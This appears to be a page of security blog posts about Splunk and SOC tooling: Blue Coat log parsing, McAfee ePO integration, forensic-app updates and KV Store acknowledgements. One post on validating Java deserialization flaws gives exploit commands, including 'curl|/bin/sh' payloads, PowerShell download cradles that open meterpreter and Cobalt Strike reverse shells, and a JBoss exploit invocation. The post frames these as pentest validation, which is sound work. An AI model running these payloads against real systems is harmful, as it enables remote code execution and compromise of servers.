Monday, April 24, 2017

Efficient Blue Coat (and other) Splunk Log Parsing

By Tony Lee

Special Notes

1)  This blog post does not only pertain to Blue Coat logs, but possibly other data sources as well.
2)  This is not a knock on Blue Coat, the app, TA, or any of that, it is just one example of many where we might want to change the way we send data to Splunk.  Fortunately Blue Coat provides the means to do so.  (hat tip)

Background info

A little while back, we were working on a custom Splunk app that included ingesting Blue Coat logs into a SOC's single pane of glass, but we were getting an error message of:

Field extractor name=custom_client_events is unusually slow (max single event time=1146ms)

The Splunk architecture was more than sufficient.  The Blue Coat TA worked great on small instances, but we found that it did not scale to a Blue Coat deployment of this magnitude.  The main reason for this error was the parsing in transforms.conf looked like this:

REGEX = (?<date>[^\s]+)\s+(?<time>[^\s]+)\s+(?<duration>[^\s]+)\s+(?<src_ip>[^\s]+)\s+(?<user>[^\s]+)\s+(?<cs_auth_group>[^\s]+)\s+(?<x_exception_id>[^\s]+)\s+(?<filter_result>[^\s]+)\s+\"(?<category>[^\"]+)\"\s+(?<http_referrer>[^\s]+)\s+(?<status>[^\s]+)\s+(?<action>[^\s]+)\s+(?<http_method>[^\s]+)\s+(?<http_content_type>[^\s]+)\s+(?<cs_uri_scheme>[^\s]+)\s+(?<dest>[^\s]+)\s+(?<uri_port>[^\s]+)\s+(?<uri_path>[^\s]+)\s+(?<uri_query>[^\s]+)\s+(?<uri_extension>[^\s]+)\s+\"(?<http_user_agent>[^\"]+)\"\s+(?<dest_ip>[^\s]+)\s+(?<bytes_in>[^\s]+)\s+(?<bytes_out>[^\s]+)\s+\"*(?<x_virus_id>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_name>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_operation>[^\"]+)

The robustness and volume of data was simply too much for this type of extraction.


The solution is not to make Splunk adapt, but instead change the way data is sent to it. The Blue Coat app and TA require sending data in the bcreportermain_v1 format--which is an ELFF format. Then the Blue Coat app and TA try to parse this space separated data using the complex regex seen above. Instead of doing that, fortunately you can instruct Blue Coat to send the data in a different format such as key value pair--which Splunk likes and natively parses.

In this case, have the Blue Coat admins define a custom log format with the following fields:

Bluecoat|date=$(date)|time=$(time)|duration=$(time-taken)|src_ip=$(c-ip)|user=$(cs-username)|cs_auth_group=$(cs-auth-group)| x_exception_id=$(x-exception-id)|filter_result=$(sc-filter-result)|category=$(cs-categories)|http_referrer=$(cs(Referer))|status=$(sc-status)|action=$(s-action)|http_method=$(cs-method)|http_content_type=$(rs(Content-Type))|cs_uri_scheme=$(cs-uri-scheme)|dest=$(cs-host)| uri_port=$(cs-uri-port)|uri_path=$(cs-uri-path)|uri_query=$(cs-uri-query)|uri_extension=$(cs-uri-extension)|http_user_agent=$(cs(User-Agent))|dest_ip=$(s-ip)|bytes_in=$(sc-bytes)|bytes_out=$(cs-bytes)|x_virus_id=$(x-virus-id)|x_bluecoat_application_name=$(x-bluecoat-application-name)|x_bluecoat_application_operation=$(x-bluecoat-application-operation)|target_ip=$(cs-ip)|proxy_name=$(x-bluecoat-appliance-name)|proxy_ip=$(x-bluecoat-proxy-primary-address)|$(x-bluecoat-special-crlf)

Since this data comes into Splunk as key=value pair now, Splunk parses it natively.

We just removed the TAs from the indexer and replaced it with a simpler props.conf file of this:


This just turns off line merging which is on by default and makes the parsing even faster. Also remember to rename the props.conf and transforms.conf (ex: .bak files) included in the app if you have it installed on your search head--that contains the same complicated regex which will slow down data ingestion. Lastly, by defining your own format, you can add other fields you care about--such as the target IP (cs-ip) which is not included in the default bcreportermain_v1 format for some reason. We hope this helps others that run into this situation.


Again, this issue is not isolated to Blue Coat, but to any data source that has the ability to change the way it sends data. We were quite happy to find that Blue Coat provides that ability and it certainly reduced the load on the entire system and gave back those resources for adding other data.  Hat tip to Blue Coat for providing the flexibility of custom log formats.  Happy Splunking!

Sunday, April 9, 2017

Quick and Easy Deserialization Validation

By Tony and Chris Lee

Maybe you are on a pentest or a vulnerability management team for your organization and you ran across a deserialization finding. This vulnerability affects a number of products including but not limited to JBoss, Jenkins, Weblogic, and Websphere. The example finding below is from Nessus vulnerability scanner:

JBoss Java Object Deserialization RCE
Description:  The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host.  (CVE-2015-7501)

Family: Web Servers
Nessus Plugin ID: 87312

Now that you have the finding you need to validate it.  We will outline just one possible method for validating JBoss, Jenkins, Weblogic, and Websphere below.

Background info

In a nutshell: "The Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library."

For more information, a very good and detailed explanation can be found here:

Step 1) Download Tools

Now on to the exploit/validation!  Clone or download the zipped tools here:

Step 2) Building the payload

Quick and easy one-liners per the exserial instructions:
The exserial readme provides two great examples shown below, but we will add a Cobalt Strike option for those who prefer a beacon shell.  If you are spawning reverse shells, remember to start your listener first.  ;-)

1) Run a shell script on a Linux victim:
$ java -jar exserial.jar CommandExec Linux "curl|/bin/sh" > payload.ser

2) Get a reverse HTTPS meterpreter shell via powershell download of Invoke-Shellcode
Setup the listener:
msf> use exploit multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set lhost <local IP>
msf> set lport <local port>
msf> set ExitOnSession false
msf> exploit -j

Create the serialized payload:
$ java -jar exserial.jar CommandExec Win "powershell IEX (New-Object Net.WebClient).DownloadString('');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ListenerIP> -Lport 4444 -Force" > payload.ser

3)  Cobalt Strike beacon
Create the listener (ex:  reverse_https to 443)
Cobalt Strike -> Listeners -> Add
Name:  rev_https
Payload windows/beacon_https/reverse_https
IP:  <Your teamserver IP>
Port:  443

Attacks -> Web Drive-by -> Scripted Web delivery
Default will work for this

Create the serialized payload:
java -jar exserial.jar CommandExec Win "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(''))" > payload.ser

Step 3) Running the Exploit

Now that the payload is created, it is time to run the exploit. In the scripts folder, you will find four python scripts. The example below shows the syntax and an example for using the JBoss exploit.

python http://<target>:<port> /path/to/payload

python  http://JbossServer:8080 /root/deserial/payload.ser


This is a fast and flexible method to validate this vulnerability. Other possibilities for validating this issue include, downloading a "flag", running a reverse ping, or a netcat shell.

Huge thanks to for the publicly available tools.

Saturday, January 7, 2017

Forensic Investigator Splunk App - Version 1.1.8

By Tony Lee and Kyle Champlin

The latest version of the Forensic Investigator app (version 1.1.8) is now available. We will only cover three major changes, but here are the rest of the details:
  • Added option to hide the MIR menus via the setup screen
  • Added proxy support to setup screen
  • Made vtLookup proxy aware
  • Made vtLookup accept and use non-default API key
  • Added CyberChef (En/Decoder -> CyberChef) - Big thanks to GCHQ for the awesome tool!
  • Added ePO Connector to control McAfee ePolicy Orchestrator
    • Requires editing bin\ and adding ePO IP, port, username, and password

1.  CyberChef

The folks over at GCHQ created an awesome encoding/decoding tool called CyberChef which is available here: Even more impressive, it is a stand-alone client-side html page which was released under the Apache License version 2.0. We integrated it into the Forensic Investigator app as a useful component that can be utilized even on closed networks. Huge thanks to the developers at GCHQ.

CyberChef integrated into the Forensic Investigator App

2.  ePO Connector

The Forensic Investigator ePO connector can be used to integrate Splunk and McAfee's ePolicy Orchestrator (ePO). This dashboard can task ePO via its API to do the following:
  • Query
  • Wake up
  • Set tag
  • Clear tag
This allows users to query for hosts using a hostname, IP addrses, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.  This feature is covered in more depth here:

ePO connector feature

3.  Proxy Awareness

You spoke and we listened. The Virus Total Lookup feature in the app is now proxy aware. If this feature works well, we will make the rest of the app proxy aware too. To enable the proxy settings, use the setup screen (Help -> Configure App) and enter the required data found in the screenshot.

Proxy setup
Please let us know if you run into any issues with the proxy setup or if it seems to be working well for you.  We will use this information to tweak the setup screen in the next version of the app.


We enjoy the feedback on the application--both good and bad, so please keep it coming. Let us know how you are using the application and how we can make it better.  Enjoy. :-)

Monday, December 26, 2016

Splunk and McAfee ePO Integration – Part II

By Tony Lee

In our previous article we outlined one method to integrate McAfee's ePolicy Orchestrator (ePO) with Splunk’s flexible Workflow actions. This allows SOC analysts to task ePO directly from Splunk. In this article, we will highlight a different and potentially more user friendly method. For convenience we have integrated this dashboard into version 1.1.8 of the Forensic Investigator app (Toolbox -> ePO Connector).

Forensic Investigator app ePO connector tool

As with the previous article, all that’s needed is the following:
  • Administrator access to Splunk
  • URL, port, and service account (with administrator rights) to ePO

Testing the ePO API and credentials

It still may be useful to first ensure that our ePO credentials, URL and port are correct. Using the curl command, we will send a few simple queries. If all is well, the command found below will result in a list of supported Web API commands.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/

If this failed, then check your credentials, IP, port, and connection. Once the command works, try the following to search for a host or user:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?searchText=<hostname/IP/MAC/User>

Splunk Integration

The Forensic Investigator ePO connector dashboard contains the following ePO capabilities:

  • Query
  • Wake up
  • Set tag
  • Clear tag

This allows users to query for hosts using a hostname, IP addrses, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.


1)  Download and install
Before this integration is possible, first install the Forensic Investigator app (version 1.1.8 or later).

2)  CLI edit
Then edit the following file:


Set the following:  IP, port, username, and password

theurl = 'https://<IP>:8443/remote/'
username = '<username>'
password = '<password>'

3)  Web UI dashboard edit
The dashboard is accessible via Toolbox --> ePO Connector.  There is a Quarantine tag present by default, but others can be added via the Splunk UI by selecting the edit button on the dashboard.

Lingering concerns

Using this integration method, there are a few remaining concerns:

  • The ePO password is contained in the python script
    • Fortunately, this is only exposed to Splunk admins.
    • Let us know if you have another solution.  :-)
  • ePO API authentication uses Base64.  The resulting URL can be modified and it will still be authenticated and will issue commands to ePO.
    • SSL should be used with the ePO API to protect the communications
    • Limit this dashboard to only trusted users.
  • Leaving the system.find searchText parameter blank returns everything in ePO
    • ePO seems resilient even to large queries.  We also filtered out blank queries in the python script.


This second ePO integration method should be quite user friendly and can be restricted to those who only need access to this dashboard. It could also be used in conjunction with out previous integration method too. Enjoy!

Sunday, December 18, 2016

Splunk and McAfee ePO Integration – Part I

By Tony Lee

Have you ever wanted to task McAfee ePolicy Orchestrator (ePO) right from Splunk? Lucky for us, ePO has robust Web API scripting capabilities and is well-documented in a reference guide found here:

Combine this with Splunk’s flexible Workflow actions and we have the basic building blocks to allow SOC analysts to task ePO. All that’s needed is the following:
  • Administrator access to Splunk
  • URL, port, and service account (with administrator rights) to ePO

Testing the ePO API and credentials

In order to start the integration, let’s first ensure that our credentials, URL and port are correct. Using the curl command, we will send a few simple queries. If all is well, the command found below will result in a list of supported Web API commands.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/

If this failed, then check your credentials, IP, port, and connection. Once the command works, try the following to search for a host or user:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?searchText=<hostname/IP/MAC/User>

Pro Tips:
  • Do not leave the searchText parameter blank or it will return everything in ePO.
  • Machine readable output such as XML or JSON may be desired. 

To return XML or JSON, use the :output parameter as shown in the example below:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?:output=json&searchText=<hostname/IP/MAC/User>

Our use case

There are many ways in which a SOC could benefit from Splunk/ePO integration. However, in this use case, we have ePO configured to perform automated actions (such as run a full AV scan) when certain tags are applied to hosts. Now wouldn’t it be convenient if we could tell Splunk to have ePO apply the tag to kick off the actions? How about clearing tags?  Both actions are exposed through ePO’s API:

Apply a tag: /remote/system.applyTag?names=<Host>&tagName=FullAVScan

Clear a tag: /remote/system.clearTag?names=<Host>&tagName=FullAVScan

Splunk Integration

One possible integration leverages Splunk’s Workflow Actions to issue these web API commands to ePO. This allows the analyst to pivot from the Event screen in a search using the Event Actions button as shown in the screenshot below:

Splunk’s Workflow actions can be setup using the following:
Settings -> Fields -> Workflow Actions -> Add New

(Note:  This example uses the field Hostname field to identify the asset, change this to match your field name):

Name:  FullAVScan
Label:  Run a FullAVScan on $Hostname$
Apply only to the following fields:  Hostname
Apply only to the following event types:  left blank 
Show action in: Both
Action type:  link
URI:  https://<User>:<Password> @<EPOServer>:<EPOport>/remote/system.applyTag?names=$Hostname$&tagName=FullAVScan
Open link in:  New window
Link method:  get

Note:  You may need to restart Splunk to make sure the Workflow Actions appear in the Event Actions drop down.

Security mitigations

This integration obviously exposes a lot of power to the Splunk analysts and potential attackers if Splunk is compromised.  Here are some steps that can be taken to limit abuse:

  • Create a specific service account in ePO for Splunk to use, do not reuse a user account
  • Limit access to the Workflow Action to a small group
  • Set a Network IP filter for the ePO/Splunk account to block any IP from using that account except the Splunk search head

The results that are returned from ePO depend on the action performed, however the message seems consistent.  See below for example messages for both a successful tasking and unsuccessful tasking.

Successful tasking:


Unsuccessful tasking:



Other possibilities

We have demonstrated the ability to query ePO for information by using hostname, IP address, MAC address, and user.  We also showed how it is possible to apply and remove tags.  But what else is possible?  You could ask ePO using the first test command used at the beginning of this article.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/

ComputerMgmt.createCustomInstallPackageCmd windowsPackage deployPath [ahId] [fallBackAhId]
[useCred] [domain] [username] [password] [rememberDomainCredentials]
agentmgmt.listAgentHandlers - List all Agent Handlers
clienttask.export [productId] [fileName] - Exports client tasks
clienttask.find [searchText] - Finds client tasks
clienttask.importClientTask importFileName – Imports

To obtain help on a specific API command, but the following syntax with the command parameter:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/

Displays all queries that the user is permitted to see. Returns the list of queries or throws on error.
Requires permission to use queries.


If issues arise, just use the curl command to eliminate complexity.  Verify credentials, IP, port, and connectivity, then move on to more complicated integration.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/

Lingering concerns

Using this integration method, there are a few remaining concerns.  There are:

  • The ePO password is contained in the Splunk Workflow setup screen
    • Fortunately, this is only exposed to Splunk admins.
  • ePO API authentication uses Base64.  The resulting URL can be modified and it will still be authenticated and will issue commands to ePO.
    • SSL in ePO should be used to protect the data
  • Leaving the system.find searchText parameter blank returns everything in ePO
    • ePO seems resilient even to large queries


This is just one example of what can be done when integrating Splunk and McAfee ePO. In our next article we will discuss further integration options using a little python and simple XML. We hope this was useful if you are ever tasked with integrating these two technologies.

Saturday, September 24, 2016

Splunk Stacking Redline and MIR host-based forensic artifacts

By Tony Lee, Max Moerles, Ian Ahl, and Kyle Champlin


Mandiant’s free forensics tool, Redline®, is well-known for its powerful ability to hunt for evil using IOCs, collect host-based artifacts, and even analyze that collected data.  While this gratis capability is fantastic, it is limited to analyzing data from only one host at a time.  But imagine the power and insight that can be gained when looking at a large set of host-based data; especially when the hosts are standardized using a base build or gold disk image.  This would allow analysts to stack this data and use statistics to find outliers and anomalies within the network.  These discovered anomalies could include:

·         Unique services within an organization (names, paths, service owners)
·         Unique processes within an organization (names, paths, process owners)
·         Unique persistent binaries (names, paths, owners)
·         Drive letters/mappings that don't meet corporate standards
·         Infrequent user authentication (such as forgotten or service accounts)

Any of the above example issues could be misconfigurations or incidents--neither of which should be left unnoticed or unsolved.

Requirements and Prototyping

To solve the stacking problem, we had four major requirements.  We needed a platform that could:

1)      Monitor a directory for incoming data
2)      Easily parse XML data (since both Redline and MIR output evidence to XML)
3)      Handle large files and break them into individual events
4)      Apply “big data” analytics to lots of hosts and lots of data

After looking at the requirements and experimenting a bit, Splunk seemed like a good fit.  We started our prototyping by parsing a few output files and creating dashboards within our freely available side project the Splunk Forensic Investigator App.  The architecture looks like the following:

Figure 1:  Architecture required to process Redline and MIR files within Splunk

We gave this app the ability to process just a few Redline and MIR output files such as system, network, and drivers.  Then we solicited feedback and were pleased with the response.


Since the prototype gained interest, we continued the development efforts and the Splunk Forensic Investigator app now handles the following 15 output files:

User Accounts
URL History
Driver Modules
File Listings
Event Logs

After installation and setup, the first dashboard you will see when processing MIR and Redline output is the MIR Analytics dashboard.  This provides heads up awareness of the number of hosts processed, number of individual events, top source types, top hosts, and much more as shown in Figure 2.

Figure 2:  Main MIR Analytics dashboard

Additionally, every processed output type includes both visualization dashboards and analysis dashboards.  Visualization dashboards are designed flush out the anomalies using statistics such as counts, unique counts, most frequent, and least frequent events.  An example can be seen in Figure 3’s visualization example.

Figure 3:  Example visualization dashboard which shows least and most common attributes
The analysis dashboards parse the XML output from Redline and MIR to display it in a human readable and searchable format.  An example can be seen below in Figure 4.

Figure 4:  Example analysis dashboard which shows raw event data


If you use Redline or MIR and would like to stack data from multiple hosts, feel free to download our latest version of the Splunk Forensic Investigator App.  Follow the instructions on the Splunk download page and you should be up and running in no time.  This work can also be expanded to HX, but it will most likely require a bit of pre-processing by first reading the manifest.json file to determine the contents of the randomized file names.  We hope this is useful for other FireEye/Mandiant/Splunk enthusiasts.

Head nod to the "Add-on for OpenIOC by Megan" for ideas: 

Monday, June 6, 2016

Event acknowlegement using Splunk KV Store

By Tony Lee


Whether you use Splunk for operations, security, or any other purpose--it can be helpful to be able to acknowledge events and add notes.  Splunk provides a few different methods to accomplish this task:  using an external database, writing to files, or the App Key Value Store (aka KV Store).  The problem with using an external database is that it requires another system to provision and protect and can add unwanted complexity.  Writing to files can be problematic in a distributed Splunk architecture that may use clustered or non-clustered components.  The last option is the Splunk KV Store which appears to be the current recommendation from Splunk, but this can also appear complex at first--thus we will do our best to break it down in this article.

In the most basic explanation, the KV Store allows users to write information to Splunk and recall it at a later time.  Furthermore, KV Store lookups can be used to augment your event data by mapping event fields to fields assigned in your App Key Value Store collections. KV Store lookups can be invoked through REST endpoints or by using the following SPL search commands: lookup, inputlookup, and outputlookup.  REST commands can require additional permissions, so this article will look at possibilities using the search commands.


Before we get started, we will list some references that helped in our understanding of the Splunk KV Store:

Deciding on the fields

For this example, we wanted to add a couple of fields to augment our event data.  Namely an acknowledgement field (we will call this Ack) and a notes field (we will call this Notes).  We will match the unique event id field with a field that is also called id.

So, in summary, we have id, Ack, and Notes.  Splunk also uses an internal _key field, but we will not reference this directly in our efforts.

Getting started

Per our references above on configuring KV Store lookups, we will need two supporting configurations:

  1. A collections.conf file specifying our collection name
  2. A stanza in transforms.conf to specify kvstore parameters

cat collections.conf 
# Splunk app KV Store collection file

head transforms.conf 

external_type = kvstore
collection = acknotescoll
fields_list = _key, id, Ack, Notes

Interacting with KV Store using search

The reference links provide helpful examples, but they do not provide everything necessary.  Some of this was discovered through a bit of trial and error.  Especially the flags and resulting behavior.  We list below the major actions that can be taken and the search commands necessary to perform those actions: 

Write new record:
| localop | stats count | eval id=101 | eval Ack="Y" | eval Notes="These are notes for event 101"| outputlookup acknotes append=True

Note:  Without append=True, the entire KV Store is erased and only this record will be present

Update a record (only works if the record already exists):
| inputlookup acknotes where id="100" | eval Ack="N" | eval Notes="We can choose not to ack event 100" | outputlookup acknotes append=True

Note:  Without append=True, the entire KV Store is erased and only this record will be present

Read all records:
| inputlookup acknotes

Read a record (A new search):
| inputlookup acknotes where id="$id$" | table _key, id, Ack, Notes

Read a record (combined with another search):
<search> | lookup acknotes where id="100" | table _key, id, Ack, Notes

Limitation and work around

Unfortunately, it does not look like Splunk has a single search command/method to update a record, but create the record if it does not already exist.  I may be mistaken about this and hope that I am missing some clever flag, so feel free to leave comments in the feedback section below.  To get around this limitation, we first created a "simple" search command to check for the existence of a record.

Determine if record exists:
| inputlookup acknotes where id="108" | appendpipe [stats count | where count==0] | eval execute=if(isnull(id),"Record Does Not Exist","Record Exists!") | table execute

Example of a record that exists

Example of record that does not exist

Conditional update:
Now that we can determine if a record exists and we know how to create a new record and update an existing record, we can combine all three to modify and/or create entries depending on their existence.

<query>| inputlookup acknotes where id="$id$" | appendpipe [stats count | where count==0] | eval execute=if(isnull(id),"| localop | stats count | eval id=$id$ | eval Ack=\"$Ack$\" | eval Notes=\"$Note$\" | outputlookup acknotes append=True","| inputlookup acknotes where id=\"$id$\" | eval Ack=\"$Ack$\" | eval Notes=\"$Note$\" | outputlookup acknotes append=True") | eval kvid=$id$ | eval kvack="$Ack$" | eval kvnote="$Note$" | eval Submit="Click me to Submit" | table kvid, kvack, kvnote, execute, Submit</query>


These are just some examples of what is possible.

You could create an event acknowledgement page

Event acknowledgement page

Once the fields are filled in at the top with the event id, acknowledgement, and notes, it could create the command to either update or add a new entry to the KV Store.  Clicking the Submit hyperlink will actually run that command and modify the KV Store.

Event acknowledgement page filled out and waiting for click to submit

Once the data is populated in the KV Store, these records can be mapped to the original events to add this data for analysts.

Original event data with KV Store augmentation


Hopefully this helps expose some of the interesting possibilities of using Splunk's KV Store to create an event acknowledgement/ticketing system using search operations.  Feel free to leave feedback below--especially if there is an easier search operation for updating a record and adding a new one if it does not already exist.  Thanks for reading.